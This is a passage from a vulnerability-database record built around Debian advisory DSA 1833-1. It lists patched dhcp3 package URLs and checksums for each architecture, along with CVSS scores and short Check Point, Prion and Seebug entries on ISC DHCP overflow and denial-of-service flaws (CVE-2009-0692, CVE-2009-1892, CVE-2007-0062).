http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 245198 4cd491f7be9374393a4d9c8687b8276a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 120404 4dfcb0d1f42836cac6d5679a1abdfcb9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 313190 5da5b48221028fff8d2fe89370ea051d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 310328 f6a3ddc984847b078c9e93ad95d82ae4\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 114232 1980df61d75ea40ebc82c22c7005b3ea\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_amd64.udeb\n Size/MD5 checksum: 188412 91cf6d4362473d908f108a45c6e1073c\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 103692 0c3678563a2fadc12054811d3c5df5be\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 336338 22a205bb36afdb50717e1187c644ca7f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 292856 d64219e9efe77445c5b3c2a5834a5f16\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 226548 30e51575f5aad4a17cda75b6277c2298\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 108874 71e3bc13d6e59a98f32f3466291becac\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_arm.udeb\n Size/MD5 checksum: 170056 460b6cb3d07249b2bf7a554504815cc3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 291164 768c6b628b9285007277a884342fff2d\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 293770 aff3c87d606cf2b7cfc8cc2b6a433ee0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 338686 20e3cf59a67c8d746918378e486adc72\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 109692 228381c7fbead4e0b3e140647c956015\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 103172 04a01c3e2e5eb34b9ca9b89ba6ff0704\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 227394 7afa7ddb6b23887f8a11ae1599c521b6\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 293020 00ed8969e284da3a687e4e6421dbdc3b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_armel.udeb\n Size/MD5 checksum: 170800 2e74568b6974af18c54a8f276157240f\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 116212 bbc799a4068272efbd27845c0b91de4d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_hppa.udeb\n Size/MD5 checksum: 194972 d86d92f993fd03f2177847d0384cdc8e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 324480 169c91330d7627dd539342a950c0ede1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 315718 e86d7975c3341d02f319f7de97b13045\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 251748 956834560fde2009ae81efba433ab9b1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 127710 f67185d6696ef7104a888053488234f8\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 369580 cf511b62e1cbced8373103dd23604631\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 332434 deceed031e4ec70f9a89a3f9f1aa83a6\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_i386.udeb\n Size/MD5 checksum: 167142 890e95b663c536bd4794e4eeaf7e4620\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 106664 e9a85ff16968a9b0a982f2650d09b97e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 224288 ccaea8e386efccf4a9a7b5a66368a18b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 286932 acd0bd92af229ba24bb9e426e518144f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 290520 41251b845417290082cead454420009a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 102132 40ccebf82e99c1f2228d0304c7c10bb0\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 400296 447643661f0ef198381636421a817e15\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 347478 0ee8f2058fca1d30fdcb4eed2e82b6b1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 159842 12d61f96202f3f68b9aff09424d79348\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 508044 130ffd524faa48178f124befdc150e47\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 464766 bf7266a768cc90bd76c785624cb4089d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_ia64.udeb\n Size/MD5 checksum: 289288 ee79b20eefaf229fb46ada9bc6ae56bf\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 155048 8ecc258935ffd55300285fc775d9f1b9\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 359176 fb5bd87ef5481f1f43c9a45dfcd3ce37\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 309030 90233c8ed44269bba30f16b0e8a84450\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 245844 16982508add38de5d1dc7e465e484d14\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 114538 291ed9f1bc54e3b8082ca4633185796c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 314358 270b38430ca3b97245c29ac4dc314172\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_mips.udeb\n Size/MD5 checksum: 188178 334dd27da8522f16bf58ac31e4d3dac2\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 124312 aef53193ecfafb6c1433223f19242a35\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 362162 67743cf382e17cfab714158bb0f37561\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 247664 b5494e175f7be190ddb2390d2b55ca79\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 310866 6387812c812dafa3b63ed7b139c48f74\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 116224 bf5038fb4e9d79beea543376f91a5404\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_mipsel.udeb\n Size/MD5 checksum: 190284 1da972b8dd8e57d7ed1e62b387329d43\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 317228 9df2929f942d894260e0783cba8668c0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 125528 34a0a833a1d5626232a7f6b0891d6fa9\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 305096 f3d385927548fe52fde1070280bda9a9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 111500 9d03e2dc815e1f2bb383f677aaf86eb9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_powerpc.udeb\n Size/MD5 checksum: 183812 82bce24908b4088c62c9d6d7622d3ac2\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 310594 97b0fd83d73c1aec8784e97a92b77ee1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 354430 0e7fc5b85c1474674e8aa1f506bbf815\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 118796 2af645bbf54897306a52a7b072cdded1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 241116 7748b01950150c4cec91d2f361c5e403\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 303410 0681214517ad4e1746d0f30a6af3854f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 348930 cda6066a1d5cfa599383e38201b662c0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 112420 cb2a4679d4d187e6373df2e8fb7de53e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_s390.udeb\n Size/MD5 checksum: 182114 55db5122f2cb6acc7169911f40c5646a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 117568 6e16df93aabfcb6892de03e3c7d9c35b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 239446 5c93734c0bd94ef02c726730418ab49c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 303678 5924002054a4233ea16e4e8769821f49\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_sparc.udeb\n Size/MD5 checksum: 161504 f4ae7e33ec0fae6818f0cae625925ee9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 218292 f4b7091a070b4dc413eb4d3e319b88f9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 109326 fe50b4989d1b397347621c5c4fef23af\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 101564 60fd708e4dcda554af9ede9b9cc396a9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 280070 7ee763f435a4881ac7f719030e59b8d0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 283656 2a79cfc252c6a772d16e34845984a5ac\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 325588 168e42992477d7e845d1d9bfde4b1cad\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;", "cvss3": {}, "published": "2009-07-14T19:33:29", "type": "debian", "title": "[SECURITY] [DSA 1833-1] New dhcp3 packages fix arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0692", "CVE-2009-1892"], "modified": "2009-07-14T19:33:29", "id": "DEBIAN:DSA-1833-1:FBD4D", "href": "https://lists.debian.org/debian-security-announce/2009/msg00147.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_security": [{"lastseen": "2023-04-17T15:50:27", "description": "\n", "cvss3": {}, "published": "2009-07-14T21:00:00", "type": "checkpoint_security", "title": "Check Point response to ISC DHCP dhclient buffer overflow vulnerability (CVE-2009-0692)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0692"], "modified": "2009-07-14T21:00:00", "id": "CPS:SK42354", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk42354", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-22T05:05:31", "description": "dhcpd in ISC DHCP 3.0.4 and 3.1.1, when the dhcp-client-identifier and hardware ethernet configuration settings are both used, allows remote attackers to cause a denial of service (daemon crash) via unspecified requests.", "cvss3": {}, "published": "2009-07-17T16:30:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1892"], "modified": "2017-08-17T01:30:00", "id": "PRION:CVE-2009-1892", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2009-1892", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-22T05:03:19", "description": "Stack-based buffer overflow in the script_write_params method in client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option.", "cvss3": {}, "published": "2009-07-14T20:30:00", "type": "prion", "title": "Stack overflow", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0692"], "modified": "2017-09-29T01:33:00", "id": "PRION:CVE-2009-0692", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2009-0692", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T05:25:49", "description": "Integer overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before 3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and ACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528; allows remote attackers to cause a denial of service (daemon crash) or execute arbitrary code via a malformed DHCP packet with a large dhcp-max-message-size that triggers a stack-based buffer overflow, related to servers configured to send many DHCP options to clients.", "cvss3": {}, "published": "2007-09-21T19:17:00", "type": "prion", "title": "Integer overflow", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0062"], "modified": "2018-10-16T16:30:00", "id": "PRION:CVE-2007-0062", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2007-0062", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:44:47", "description": "Bugraq ID: 35669\r\nCVE ID\uff1aCVE-2009-1892\r\n\r\nISC DHCP\u662f\u4e00\u6b3e\u5f00\u6e90\u7684DHCP\u670d\u52a1\u5b9e\u73b0\u3002\r\nISC DHCP\u670d\u52a1\u5668\u4e0d\u6b63\u786e\u5904\u7406DHCP\u8bf7\u6c42\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5bf9\u5e94\u7528\u7a0b\u5e8f\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u6f0f\u6d1e\u7ec6\u8282\u63d0\u4f9b\u3002\n\nISC DHCPD 3.0.1 rc9\r\n+ Conectiva Linux Enterprise Edition 1.0\r\n+ Debian Linux 3.0 sparc\r\n+ Debian Linux 3.0 s/390\r\n+ Debian Linux 3.0 ppc\r\n+ Debian Linux 3.0 mipsel\r\n+ Debian Linux 3.0 mips\r\n+ Debian Linux 3.0 m68k\r\n+ Debian Linux 3.0 ia-64\r\n+ Debian Linux 3.0 ia-32\r\n+ Debian Linux 3.0 hppa\r\n+ Debian Linux 3.0 arm\r\n+ Debian Linux 3.0 alpha\r\n+ Debian Linux 3.0\r\n+ OpenPKG OpenPKG 1.1\r\n+ S.u.S.E. Linux 8.1\r\nISC DHCPD 3.0.1 rc8\r\nISC DHCPD 3.0.1 rc7\r\n- FreeBSD FreeBSD 4.5\r\n- FreeBSD FreeBSD 4.4\r\n- FreeBSD FreeBSD 4.3\r\n- FreeBSD FreeBSD 4.2\r\n- FreeBSD FreeBSD 4.1.1\r\nISC DHCPD 3.0.1 rc6\r\n+ S.u.S.E. Linux 8.0 i386\r\n+ S.u.S.E. Linux 8.0\r\nISC DHCPD 3.0.1 rc5\r\nISC DHCPD 3.0.1 rc4\r\n+ OpenPKG OpenPKG 1.0\r\nISC DHCPD 3.0.1 rc3\r\nISC DHCPD 3.0.1 rc2\r\nISC DHCPD 3.0.1 rc14\r\nISC DHCPD 3.0.1 rc13\r\nISC DHCPD 3.0.1 rc12\r\nISC DHCPD 3.0.1 rc11\r\n+ OpenPKG OpenPKG 1.2\r\n+ OpenPKG OpenPKG Current\r\nISC DHCPD 3.0.1 rc10\r\n+ OpenPKG OpenPKG Current\r\nISC DHCPD 3.0.1 rc1\r\nISC DHCPD 3.0 rc4\r\n+ S.u.S.E. Linux 7.2 i386\r\n+ S.u.S.E. Linux 7.2\r\nISC DHCPD 3.0 rc12\r\n+ S.u.S.E. Linux 7.3 sparc\r\n+ S.u.S.E. Linux 7.3 ppc\r\n+ S.u.S.E. Linux 7.3 i386\r\n+ S.u.S.E. Linux 7.3\r\nISC DHCPD 3.0 pl2\r\nISC DHCPD 3.0 pl1\r\n+ Gentoo Linux 1.4 _rc2\r\n+ Gentoo Linux 1.4 _rc1\r\n+ RedHat Linux 8.0 i386\r\n+ RedHat Linux 8.0\r\n+ Slackware Linux 8.1\r\nISC DHCPD 3.0 b2pl9\r\n+ MandrakeSoft Linux Mandrake 7.2\r\nISC DHCPD 3.0 b2pl23\r\n+ MandrakeSoft Single Network Firewall 7.2\r\nISC DHCPD 3.0\r\n+ Caldera OpenLinux Server 3.1.1\r\n+ Caldera OpenLinux Server 3.1\r\n+ Caldera OpenLinux Workstation 3.1.1\r\n+ Caldera OpenLinux Workstation 3.1\r\n+ Conectiva Linux 8.0\r\n+ MandrakeSoft Linux Mandrake 9.0\r\n+ MandrakeSoft Linux Mandrake 8.2 ppc\r\n+ MandrakeSoft Linux Mandrake 8.2\r\n+ MandrakeSoft Linux Mandrake 8.1 ia64\r\n+ MandrakeSoft Linux Mandrake 8.1\r\n+ MandrakeSoft Multi Network Firewall 2.0\r\n- S.u.S.E. Linux 8.0\r\n- S.u.S.E. Linux 7.3\r\n- S.u.S.E. Linux 7.2\r\n- S.u.S.E. Linux Connectivity Server\r\n- S.u.S.E. Linux Database Server 0\r\n- S.u.S.E. Linux Enterprise Server 7\r\n- S.u.S.E. Linux Enterprise Server for S/390\r\n- S.u.S.E. SuSE eMail Server III\r\nISC DHCPD 3.0.2rc1\r\nISC DHCPD 2.0.pl5\r\n+ Debian Linux 3.0 sparc\r\n+ Debian Linux 3.0 s/390\r\n+ Debian Linux 3.0 ppc\r\n+ Debian Linux 3.0 mipsel\r\n+ Debian Linux 3.0 mips\r\n+ Debian Linux 3.0 m68k\r\n+ Debian Linux 3.0 ia-64\r\n+ Debian Linux 3.0 ia-32\r\n+ Debian Linux 3.0 hppa\r\n+ Debian Linux 3.0 arm\r\n+ Debian Linux 3.0 alpha\r\nISC DHCPD 2.0\r\nDebian Linux 5.0 sparc\r\nDebian Linux 5.0 s/390\r\nDebian Linux 5.0 powerpc\r\nDebian Linux 5.0 mipsel\r\nDebian Linux 5.0 mips\r\nDebian Linux 5.0 m68k\r\nDebian Linux 5.0 ia-64\r\nDebian Linux 5.0 ia-32\r\nDebian Linux 5.0 hppa\r\nDebian Linux 5.0 armel\r\nDebian Linux 5.0 arm\r\nDebian Linux 5.0 amd64\r\nDebian Linux 5.0 alpha\r\nDebian Linux 5.0\r\nDebian Linux 4.0 sparc\r\nDebian Linux 4.0 s/390\r\nDebian Linux 4.0 powerpc\r\nDebian Linux 4.0 mipsel\r\nDebian Linux 4.0 mips\r\nDebian Linux 4.0 m68k\r\nDebian Linux 4.0 ia-64\r\nDebian Linux 4.0 ia-32\r\nDebian Linux 4.0 hppa\r\nDebian Linux 4.0 armel\r\nDebian Linux 4.0 arm\r\nDebian Linux 4.0 amd64\r\nDebian Linux 4.0 alpha\r\nDebian Linux 4.0\r\nAdmanager Admanager 3.0 pl2\n\u53ef\u5347\u7ea7\u5230\u5982\u4e0b\u7a0b\u5e8f\uff1a\r\nDebian Linux 4.0 arm\r\nDebian dhcp3-client-udeb_3.0.4-13+etch2_arm.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.0.4-13+etch2_arm.udeb\r\nDebian dhcp3-common_3.0.4-13+etch2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0. 4-13+etch2_arm.deb\r\nDebian dhcp3-dev_3.0.4-13+etch2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-1 3+etch2_arm.deb\r\nDebian dhcp3-relay_3.0.4-13+etch2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4 -13+etch2_arm.deb\r\nDebian dhcp3-server_3.0.4-13+etch2_arm.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0. 4-13+etch2_arm.deb\r\nDebian Linux 5.0 ia-64\r\nDebian dhcp3-client-udeb_3.1.1-6+lenny2_ia64.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.1.1-6+lenny2_ia64.udeb\r\nDebian dhcp3-client_3.1.1-6+lenny2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1. 1-6+lenny2_ia64.deb\r\nDebian dhcp3-common_3.1.1-6+lenny2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1. 1-6+lenny2_ia64.deb\r\nDebian dhcp3-dev_3.1.1-6+lenny2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6 +lenny2_ia64.deb\r\nDebian dhcp3-relay_3.1.1-6+lenny2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1 -6+lenny2_ia64.deb\r\nDebian dhcp3-server-ldap_3.1.1-6+lenny2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap _3.1.1-6+lenny2_ia64.deb\r\nDebian dhcp3-server_3.1.1-6+lenny2_ia64.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1. 1-6+lenny2_ia64.deb\r\nDebian Linux 4.0 powerpc\r\nDebian dhcp3-client-udeb_3.0.4-13+etch2_powerpc.udeb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb _3.0.4-13+etch2_powerpc.udeb\r\nDebian dhcp3-common_3.0.4-13+etch2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0. 4-13+etch2_powerpc.deb\r\nDebian dhcp3-dev_3.0.4-13+etch2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-1 3+etch2_powerpc.deb\r\nDebian dhcp3-relay_3.0.4-13+etch2_powerpc.deb\r\nhttp://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4 -13+etch2_powerpc.deb\r\nDebian 